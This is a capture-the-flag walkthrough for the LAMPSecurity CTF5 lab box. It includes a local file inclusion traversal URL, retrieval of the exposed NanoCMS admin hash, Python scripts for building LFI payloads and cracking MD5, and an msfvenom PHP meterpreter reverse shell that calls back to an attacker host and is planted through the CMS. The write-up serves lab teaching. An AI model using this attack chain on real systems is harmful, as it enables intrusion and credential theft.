LAMPSECURITY: CTF5 Full tutorial from scratch

Introduction

In this post you will learn how to crack LAMPSecurity CTF5. Below is the video version of the post, so check it out as well.

Visit here to download the box: LAMPSecurity: CTF5 ~ VulnHub

Video

Solving LAMPSECURITY: CTF5

Just follow the steps below and by the end of the post you will be able to clear the box. If you have any doubts, comment below or watch the video.

Identifying IP address

To identify the IP of the target I just run arp-scan -l; you can also use the netdiscover command.

arp-scan -l

Information gathering using Nmap

I am doing a full TCP port scan (-p-) and at the same time detecting the OS and the service versions (-A).

nmap -A -p- <Target IP> -T4

nmap -A -p- 192.168.1.38 -T4

Save the results to a file (for example with -oN or -oA) and take note of the OS, the services and their versions, and which ports are open.

Going through the nmap output we can see that multiple ports are open. Every open service is a candidate, but the web server is the natural place to start, so that is where we go first.

Copy the target's IP address, paste it into a browser and see what we get.

Vulnerability analysis

Let's run nikto against the web server and check for vulnerabilities; you can also use OpenVAS or Nessus for this.

We will be exploiting the finding on /index.php, because it indicates that local or remote file inclusion (LFI/RFI) is possible: the page parameter of index.php is passed to a file include.

And the target machine is indeed vulnerable to LFI.

Copy the URL below and paste it into the browser, making sure you enter the correct target IP address.

http://192.168.1.38/index.php?page=../../../../../../../../../etc/passwd%00

/etc/passwd is the standard first file to read with an LFI because it is world-readable, so the read works no matter which user the web server runs as. Note that on any modern Linux the password hashes are not in it (they live in /etc/shadow, readable only by root); what you get is the list of accounts on the box. The trailing %00 is a null byte that truncates anything the script appends to the path, such as a .php extension; this trick only works on PHP versions before 5.3.4.

And there it is: the content of /etc/passwd.

I also found a redirect that looked quite fishy, so I took note of it: click on the Blog menu and you will be redirected to http://192.168.1.38/~andy/
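As an added example (not part of the original walkthrough), the Python below builds the traversal payload from the step above and parses the /etc/passwd you get back into the accounts that matter. The sample passwd content is constructed, not the real box output, and the base URL, the page parameter name and the UID cutoff of 500 (the first regular user on CentOS 5-era systems) are assumptions. The account list is what links the LFI read to the /~andy/ path: Apache's UserDir feature maps /~user/ to that user's web directory, so every regular account is a candidate.

```python
from urllib.parse import quote

# Constructed sample of what the LFI read returns (not the real box output).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
andy:x:500:500:Andy:/home/andy:/bin/bash
"""


def lfi_url(base, target="/etc/passwd", param="page", depth=9, null_byte=True):
    """Build the directory-traversal URL used in the walkthrough.

    depth:     number of ../ to prepend. Extra ones are harmless because
               the kernel stops at / when resolving the path.
    null_byte: append a %00 so that anything the script concatenates after
               the parameter (typically ".php") is cut off. PHP rejects null
               bytes in include paths from 5.3.4 on, so this only works on
               older PHP.
    """
    payload = "../" * depth + target.lstrip("/")
    if null_byte:
        payload += "\x00"
    # safe="/" keeps the slashes literal; the null byte becomes %00.
    return f"{base}/index.php?{param}={quote(payload, safe='/')}"


def login_accounts(passwd_text):
    """Return (name, uid, home) for accounts that have an interactive shell.

    /etc/passwd holds no password hashes on a modern system (those live in
    /etc/shadow, readable only by root); what the LFI read gives you is a
    list of accounts to target.
    """
    accounts = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:      # skip blank or mangled lines
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        if shell.endswith("/nologin") or shell.endswith("/false"):
            continue
        accounts.append((name, int(uid), home))
    return accounts


def userdir_urls(base, passwd_text, min_uid=500):
    """Candidate Apache UserDir paths (/~user/) for regular, non-system users.

    min_uid=500 is an assumption matching CentOS 5-era defaults; newer
    distributions start regular users at 1000.
    """
    return [f"{base}/~{name}/"
            for name, uid, _home in login_accounts(passwd_text)
            if uid >= min_uid]


if __name__ == "__main__":
    base = "http://192.168.1.38"   # assumed target address from the post
    print(lfi_url(base))
    for url in userdir_urls(base, SAMPLE_PASSWD):
        print("try:", url)
```

Running it prints the same URL as in the step above and suggests http://192.168.1.38/~andy/, which is exactly the path the Blog link redirects to.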

The site is powered by NanoCMS. NanoCMS is an old PHP-based content management system that is now discontinued.

I searched Google for known vulnerabilities and found this advisory: https://www.securityfocus.com/bid/34508/exploit

It says that NanoCMS stores the admin password hash in data/pagesdata.txt, and that file is readable without authentication.

So I browsed to http://192.168.1.38/~andy/data/pagesdata.txt

Crack the MD5 Password hash

Looking at the hash (32 hex characters), a good first guess is MD5. I used the Ultimate Hashing and Anonymity toolkit (md5hashing.net) to look it up. Keep in mind that an online lookup sends the hash to a third party; that is fine for a CTF, but on a real engagement crack it offline.

The hash resolves to the password shannon, and the username is admin.
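As an added example that is not from the original post: an offline dictionary attack on an unsalted MD5 hash in Python, so the hash never leaves your machine. The wordlist below is constructed for illustration; in practice you would feed it rockyou.txt or similar through crack_file. The target digest is computed from the known answer shannon because the actual hash value is not reproduced in the post.

```python
import hashlib

# Constructed wordlist standing in for rockyou.txt and friends.
WORDLIST = ["password", "123456", "admin", "shannon", "letmein"]


def md5_hex(word):
    """Hex MD5 of a candidate password (what NanoCMS stored)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_md5(target_hex, candidates):
    """Dictionary attack: return the candidate whose MD5 matches, else None.

    Unsalted MD5 is a poor password hash: one cheap hash computation per
    guess, and identical passwords always produce identical hashes, so
    precomputed lookup tables work against it too.
    """
    target_hex = target_hex.strip().lower()
    if len(target_hex) != 32 or any(c not in "0123456789abcdef" for c in target_hex):
        raise ValueError("not a hex MD5 digest")
    for word in candidates:
        word = word.rstrip("\r\n")          # tolerate file lines
        if md5_hex(word) == target_hex:
            return word
    return None


def crack_file(target_hex, wordlist_path):
    """Stream a wordlist file through crack_md5 without loading it all."""
    with open(wordlist_path, encoding="utf-8", errors="ignore") as fh:
        return crack_md5(target_hex, fh)


if __name__ == "__main__":
    import sys
    # Usage: python crack.py <md5-hex> <wordlist>; defaults to the demo list.
    if len(sys.argv) == 3:
        print(crack_file(sys.argv[1], sys.argv[2]))
    else:
        print(crack_md5(md5_hex("shannon"), WORDLIST))
```

The same attack with standard tooling is hashcat -m 0 hash.txt wordlist.txt or john --format=raw-md5 hash.txt; both are far faster than Python for large wordlists, but the logic is the same.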

Accessing as admin

Now go to the admin login at http://192.168.1.38/~andy/data/nanoadmin.php and enter the username and password.

Creating a reverse PHP shell

Let's generate a PHP reverse shell with msfvenom using the command below (lhost is your own attacker IP, not the target):

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw

We have generated the reverse PHP shell. Copy everything from <?php to die() and paste it into a new page.

Open the NanoCMS Admin panel of the website, navigate to the New Page option and paste the reverse PHP shell in the Content section. Input any name in the Title and click on the Add Page.

Catching the reverse PHP shell with msfconsole

Enter these commands to catch the shell:

msfconsole

msf > use exploit/multi/handler

Set the payload to the same one msfvenom generated:
msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Set lhost to your own (attacker) IP address, the same one you passed to msfvenom, and lport to the port you chose:
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444

Now, let’s run the exploit
msf exploit(handler) > run

On the other side, open the page you just created in the browser; the PHP runs when the page is rendered, and you will get the meterpreter session in your handler.

Conclusion

This CTF5 box was a little tougher compared to CTF4, but it was really fun, and there is also a manual way to exploit it without Metasploit. I rate the difficulty 5.5 out of 10.


Also Read: Bandit level 0 to 33 full tutorial

Also Read: Lampsecurity:CTF4 Tutorial
